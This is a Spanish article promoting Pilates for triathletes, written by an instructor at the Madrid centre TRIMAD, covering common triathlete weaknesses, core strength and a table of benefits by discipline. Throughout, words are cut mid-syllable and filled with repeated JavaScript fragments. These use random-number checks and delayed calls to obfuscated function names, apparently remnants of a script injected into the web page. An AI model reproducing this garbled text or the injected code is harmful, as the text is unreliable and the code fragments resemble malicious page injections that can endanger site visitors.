El método Pilates está arraigado en el mundo anglosajón desde hace décadas y aunque en España aterrizó hace tiempo aún hay que luchar contra la percepción generalizada de substituto de “gimnasia” o método de entrenamiento de famosos.
En USA o Australia a nadie le sorprende escuchar a grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes campeones de triatlón como Emma Snowsill o Craig Alexandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ander hablar sobre sus entrenamientos de Pilates.
Aunque gran parte de los triatletas incluís sesiones de gimnasio como parte de la rutina semanal, este artículo explica los motivos por lo que debéis decidiros a probar Pilates e incluirlo en vuestra planilla semanal. La forma de encontrar la mejora que buscáis puede no ser sólo hacer más metros o más gimnasio. Probad. El premio es considerable: menos lesiones, mayor eficiencia del movimiento y un mayor rendimiento en las tres disciplinas.

¿EXISTE EL TRI-PILATES?
El término “Tri-Pilates” no es oficial. Podréis encontrarlo en vuestra búsqueda por Internet sobre todo en países como los Estados Unidos.
En este artículo, nos referimos a Tri-Pilates como una serie de ejercicios del método Pilates que tienen en cuenta las necesidades específicas del cuerpo de los triatletas.

EL TRIATLETA TIPO
El método Pilates tiene en cuenta la fisionomía de cada persona, sus lesiones y necesidades. Así, el jugador de tenis o de baloncesto obtendrá mayores beneficios si se estudian las especificidades de su deporte.
El caso del triatlón no es diferente ya que el cuerpo de lo que llamaremos “triatleta tipo” tiene características como consecuencia de las peculiaridades de dicho deporte (combinación de tres disciplinas, transiciones, etc.).
El estudio biomecánico realizado a un grupo de triatletas en TRIMAD mediante tests funcionales y posturales indica más de treinta puntos que ayudan a dibujar al triatleta tipo. Destacamos alguno de dichos puntos del análisis liderado por el equipo de fisioterapeutas e instructores de Pilates de TRIMAD:
• Rigidez del pie: la falta de movilidad es una característica muy común entre triatletas y deportistas provenientes de las tres disciplinas (atletas, nadadores o ciclistas). El pie es uno de los grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes olvidados entre tantas sesiones de musculación, series, técnica, etc.
• Inhibición del glúteo: siendo uno de los músculos más potentes y fibrosos del cuerpo, en el caso de muchos triatletas no ejerce su función correctamente. Ello impacta de forma negativa a otros músculos (p.e. isquiotibiales) que tienden a sobrecargarse para absorber la deficiencias del glúteo.
• Disfunción de la cintura escapular: consecuencia de la gran cantidad de movimientos repetitivos asociados al tren superior (i.e. carrera, natación).
• Bloqueo de la zona lumbar e inestabilidad de las cervicales debido a las posturas forzadas en los segmentos de natación y ciclismo.
Tener en cuenta las características del cuerpo del triatleta tipo permitirá establecer el entrenamiento más adecuado, siempre respetandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la fisionomía individual de cada deportista.

LA MÁQUINA PERFECTA
Pero, ¿qué es “el core”?
Gran parte de los artículos más recientes sobre Pilates se centran en el “core” ya que, efectivamente, uno de los grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes beneficios de Pilates es su fortalecimiento.
De forma visual imaginemos que es “el centro”, el panel de control desde donde se maneja el resto de nuestro cuerpo. De forma más técnica es la región donde se conecta la zona abdominal y lumbo-pélvica, el lugar que conecta los músculos abdominales y la región lumbar con el glúteo.
El core permite al triatleta estar “bien armado”, estabilizar, ligar de forma correcta los movimientos del tren superior e inferior y así transmitir de forma eficiente la fuerza de cada brazada, pedalada o zancada. Así, gracias a su fortalecimiento se producen cambios espectaculares en la forma de nadar, ir en bici o correr.

Conciencia de nuestro cuerpo: cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el detalle marca la diferencia
Imaginemos una casa cuya fachada atrae nuestra atención. Si entramos y los cimientos no son sólidos concluiremos que dicha casa no es la ideal: la práctica del Tripilates busca la economía en la postura y los gestos (“lo que se ve”) pero también el fortalecimiento de los músculos más pequeños (“lo que no se ve”).
LOS PEQUEÑOS DETALLES MARCAN LA DIFERENCIA

En el cuerpo del deportista los grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes músculos y los pequeños tienen su función: los primeros dotan al gesto de elegancia e imprimen potencia mientras que los segundos estabilizan en todo momento el movimiento. Sin estos elementos estabilizadores, los músculos que todos conocemos y ejercitamos en el gimnasio (cuádriceps, gemelos, isquiotibial, etc.) no trabajarán de forma eficiente y se incrementa el riesgo de lesiones.
Muchos triatletas, a través de las sesiones de gimnasio, trabajan la musculatura más visible, los grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes músculos. Sin embargo, el hacer abdominales o sentadillas, no permite fortalecer los pequeños músculos cuya importancia es extraordinaria, aunque no se “vean”: son los cimientos que estabilizan la casa.

Eficiencia y flexibilidad: hacia el gesto perfecto
Un beneficio asociado al pilates enfocado al traitlón es el conseguir una mayor flexibilidad, coordinación y fluidez del movimiento.
Por ejemplo, hemos señalado anteriormente que el pie del triatleta tiende a actuar “como un bloque”. Todos somos conscientes de la importancia de la eficiencia de la zancada, leemos artículos, nos gusta hacernos la prueba de biomecánica de la pisada, comprarnos la zapatilla que incorpora la última tecnología, etc. Pero, ¿cuántos de nosotros realizamos ejercicios para mejorar la flexibilidad del pie?

No vamos a realizar el cálculo es este artículo pero nos sorprenderíamos del ahorro energético durante un maratón si conseguimos una buena zancada. Zancada a zancada hay una pérdida de energía y un incremento de fatiga que puede derivar en lesión. Un pie flexible, que permita acompañar al movimiento en sus distintas fases (apoyo, impulso, despegue), permite ahorrar energía y evitar lesiones. Pilates ayuda a conseguir dicho pie.

¿POR DÓNDE EMPIEZO?
Tus características fisonómicas, tu procedencia (¿vienes de la natación, el atletismo o el ciclismo?), tus lesiones más recientes y objetivos (¿corta, media, larga distancia?) harán necesarios ajustar las directrices generales de Tripilates. Por eso, si has asistido alguna vez a una clase de Pilates, habrás visto que las clases cuentan con pocos alumnos lo que asegura que el instructor pueda adaptar los ejercicios a cada persona.
La tabla adjunta resume los beneficios del Pilates para la práctica del triatlón. Además indica, dependiendo de las características personales de cada triatleta, posibles áreas en las que se debe incidir (p.e. cuello, isquiotibiales, zona lumbar, etc) al realizar ejercicios de Pilates.

Disciplina Evita lesiones / molestias comunes Mejora del rendimiento
Natación • dolores en cuello y espalda
• sobrecarga de la cintura escapular • gestos más “elegantes” y fluidos
• coordinación gesto/respiración
Ciclismo • dolores lumbares o dorsales derivados de posturas forzadas en la bicicleta • mayor conexión y estabilidad
• optimización juego pie-tobillo
Carrera • lesiones del isquiotibiales
• desajustes en la pelvis • economía de zancada
• estabilidad de la pelvis
¡NADA, PEDALE, CORRE,…VUELA! La práctica del Tripilates repercute un (i) evitar lesiones comunes y (ii) mejorar el rendimiento gracias a gestos más eficientes y el equilibrio corporal.

Gran parte de los ejercicios de Tripilates se centran en:
• Conseguir una mayor estabilidad. Por ejemplo, ejercicios centrados en la región lumbo-pélvica y zona escapular.
• Conseguir un fortalecimiento de la espalda. Por ejemplo, ejercicios que involucran los músculos dorsales y lumbares.
• Incrementar la movilidad de “piezas” clave. Por ejemplo, ejercicios que ejercitan y trabajan la cadera y el pie.
• Aumentar la flexibilidad de músculos importantes para cada una de las disciplinas. Por ejemplo, ejercicios que involucran al dorsal ancho y pectoral para mejorar la técnica y eficiencia en natación.
Dos últimos consejos:
(i) para obtener un beneficio real es recomendable la práctica habitual de Tripilates ya que una práctica esporádica limita el efecto positivo.
(ii) si decides probar Tripilates / Pilates es mejor que lo hagas junto con un profesional que te asista. Los ejercicios que verás en libros/revistas te pueden ayudar pero mal realizados te pueden lesionar.

Por si aún tienes dudas a estas alturas, insistimos: si eres triatleta/atleta y estás pensandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en qué más puedes hacer para mejorar, Tripilates puede ser tu mejor aliado. Será el elemento que potencie todos tus metros en piscina, los kilómetros en bici, las series o el trabajo de técnica. ¿Tri animas?
______________________________________________________________________
La autora de este artículo, Billie Pérez, es instructora de Pilates en TRIMAD, centro de triatlón y running en Madrid. En torno a la idea “Equípate, Entrénate y Recupérate con nosotros” además de tienda de triatlón/running, TRIMAD cuenta con grupos de entrenamiento, Pilates y masajes/osteopatía.
TRIMAD está situado en Madrid Río / Puente Segovia, a pocos metros del circuito de la Casa de Campo que es punto de referencia del triatlón en pruebas internacionales y populares en España. Más información en www.trimad.es y facebook.

Share This